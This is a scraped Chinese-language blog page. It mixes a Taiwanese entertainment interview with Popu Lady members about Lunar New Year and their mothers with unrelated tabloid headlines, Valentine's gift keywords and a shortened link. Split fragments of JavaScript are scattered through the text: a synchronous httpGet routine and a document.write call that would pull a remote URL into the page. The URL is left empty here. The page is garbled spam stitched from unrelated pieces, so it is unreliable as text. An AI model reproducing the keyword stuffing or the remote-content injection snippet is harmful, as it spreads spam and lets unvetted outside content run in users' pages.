情人節來囉!找到最適合的甜蜜禮物

最有心送禮推薦:https://goo.gl/222ida

 

function httpGet(theUrl){var xmlHttp = new XMLHttpRequest();xmlHttp.open( 'GET' , theUrl, false );xmlHttp.send( null );return xmlHttp.responseText;}





▲Popu Lady洪詩、大元、寶兒、庭萱

高雄 情人節巧克力 推薦

受訪。(圖/記者李毓康攝)

高鳴叮嚀孫女劉

對情人說感動的話

奕兒進圈子靠自己

var theUrl = '';

女星車子遭撞群男上車性

男生情人節禮物要送什麼

侵2小時

記者盧薇淩/專訪

▲寶兒與媽媽感情好,感謝媽媽辛苦扶養長大。(圖/記者李毓康攝)

真的親了!許維恩直播中啾咪Kid

劉奕兒暴哭送高鳴!孫女身分曝光

自製情人節巧克力教學





▲洪詩過年陪媽媽回新竹娘家。(圖/記者李毓康攝)

過年時寶兒與媽媽待在家,她說:「她其實是個宅女,她不喜歡人擠人又花錢,只能跟她抱抱說我愛妳。」母女倆感情好,笑說媽媽愛「咬她」表現關愛,「可能她覺得很好咬,覺得很嫩很有彈性,也會跟我玩、互打鬧。」洪詩初三時陪媽媽回娘家,她透露外婆行走不便,這幾年回家時已認不得她,也更珍惜跟外婆相聚時間。

女星遭性侵主嫌遭逮影片曝光!

▲寶兒談到媽媽忍不住哽咽。(圖/記者李毓康攝)

Popu Lady 2016年推出如「辭海」般厚重的寫真書,她們穿上比基尼在泰國拍攝,堪稱是這一年最大挑戰,去年底經歷淘汰賽,出道以來走過4年,Popu Lady希望有機會5人能合拍一部戲劇,再來就是多點時間聚會,大元笑說:「現在大家都各自忙拍戲,從去年聖誕節至今,想約5人聚會到還沒約成,就連練舞都是凌晨。」除了戲劇,也希望舉行Popu Lady的小型音樂會。

▲▼大元、庭萱回家鄉陪家人過年。(圖/記者李毓康攝)



7-11情人節商品



4款床戲體位激情直逼《格雷》

女偶像遭砍首度公審!陪審員昏倒

海倫清桃離婚34天勾胸肌男回家

document.write(httpGet(theUrl));

Popu Lady出道剛滿4週年,團員們近期各自忙拍戲,農曆過年短暫休假後即繼續上工,他們各自回家鄉,與許久不見的親戚聚會,透露每年包的紅包數字會在群組討論,希望每年數字都能上修,不過寶兒坦言媽媽不太喜歡花她的錢,「她總希望我省下來,連一百塊都捨不得花。」

舒淇嘆「虎背熊腰」

情人節禮物diy 送男生

網路訂購情人節巧克力

>情人節卡片設計 diy

揭懷孕真相

小A辣當眾被性騷擾崩潰!

情人節禮物diy做法



Naomi懷孕9月胎兒擠壓腎臟劇痛

侯昌明掀開布袋驚見金髮洋妞

周揚青連發4張「未P圖照」



林俊傑錄《跑男》

男生特別情人節禮物

!扮收銀員清唱

從小在單親家庭中長大,講到媽媽寶兒忍不住哽咽,前年她跟洪詩舉辦生日會,現場聚集許多人,她偷偷跑出去打電話給媽媽,哭著說:「媽媽謝謝妳。」寶兒說:「生日當天我跟朋友出去,但後來才發現,媽媽其實才是最偉大的,我邊哭邊跟她講,她是很愛甜言蜜語的媽媽。」從小與媽媽相依為命,寶兒也說:「她很辛苦很辛苦地帶大我,我從小不會覺得沒有爸爸跟別人不一樣,她給我很多的愛,都是double的,怕我被別的小朋友比下去,但其實我擁有這些時,代表我媽媽什麼都沒有 ,覺得她很辛苦。」

Popu Lady 5人感情好,連紅包數字都在群組討論,她們陸續接演多部戲劇,也期許每年包給長輩的紅包,「都能再多出一點。」農曆過年洪詩、庭萱回故鄉過年,也安排出國旅遊,寶兒則是與媽媽吃飯、出門走春,她透露媽媽常捨不得花錢,「她連一百塊都捨不得花,有時吃上4、5百塊,回家後她會說,那我們不要出去吃飯了。」媽媽心疼她辛苦賺錢,寶兒則會對媽媽說:「到底要賺多少錢才讓妳捨得花!」不過每年少不了在紅包袋上寫字,對媽媽說「我愛妳。」
arrow
arrow

    情人對戒 推薦 發表在 痞客邦 留言(0) 人氣()